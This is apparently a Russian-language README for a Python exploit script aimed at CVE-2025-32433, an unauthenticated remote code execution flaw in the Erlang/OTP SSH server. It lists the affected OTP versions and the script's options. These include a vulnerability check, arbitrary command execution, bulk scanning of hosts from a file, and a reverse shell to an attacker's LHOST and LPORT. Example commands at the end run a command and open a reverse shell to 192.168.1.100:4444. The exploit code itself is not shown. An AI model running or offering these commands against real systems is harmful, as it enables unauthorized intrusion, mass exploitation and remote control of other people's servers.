
Уязвимость позволяет атакующему, имеющему сетевой доступ к SSH-серверу Erlang/OTP, выполнить произвольный код без предварительной аутентификации.
Уязвимость позволяет атакующему, имеющему сетевой доступ к SSH-серверу Erlang/OTP, выполнять произвольный код без предварительной аутентификации.
В SSH-сервере Erlang/OTP выявлена серьёзная уязвимость, которая может позволить атакующему осуществить удалённое выполнение кода (RCE) без аутентификации. Используя недостаток в обработке сообщений протокола SSH, злоумышленник может получить несанкционированный доступ к затронутым системам и выполнять произвольные команды без действительных учётных данных. Это может привести к компрометации указанных хостов, что позволит третьим лицам получить несанкционированный доступ к конфиденциальным данным и манипулировать ими либо приведёт к атакам типа «отказ в обслуживании».
OTP-27.3.2 и более ранние
OTP-26.2.5.10 и более ранние
OTP-25.3.2.19 и более ранние
python cve-2025-32433.py <host> [options]
Параметры:
-p PORT, --port PORT: порт SSH (по умолчанию: 22)
-t TIMEOUT, --timeout TIMEOUT: время ожидания подключения в секундах (по умолчанию: 5)
-c COMMAND, --command COMMAND: пользовательская команда для выполнения
--check: проверить, уязвима ли цель
-u urls.txt, --urlfile urls.txt: файл со списком хостов для сканирования (по одному в строке)
-o output.txt, --output output.txt: выходной файл для сохранения результатов.
--shell: запустить обратную оболочку
--lhost LHOST: IP-адрес атакующего для обратной оболочки
--lport LPORT: порт атакующего для обратной оболочки (по умолчанию: 4444)
python cve-2025-32433.py 127.0.0.1 --check
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444